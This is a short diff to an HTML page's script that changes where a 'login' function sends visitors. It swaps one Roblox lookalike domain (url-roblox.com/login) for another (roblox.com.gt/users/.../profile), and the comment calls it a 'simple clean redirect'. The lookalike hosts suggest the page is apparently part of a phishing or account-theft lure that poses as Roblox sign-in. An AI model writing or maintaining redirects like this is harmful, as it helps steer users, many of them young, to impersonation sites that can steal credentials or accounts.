--- a/index.html
+++ b/index.html
@@ -286,7 +286,7 @@
 
     // Simple clean redirect
     function openLogin() {
-      window.location.href = "https://url-roblox.com/login?returnUrl=7362013241297120";
+      window.location.href = "https://roblox.com.gt/users/9249581473/profile";
     }
   </script>
 </body>
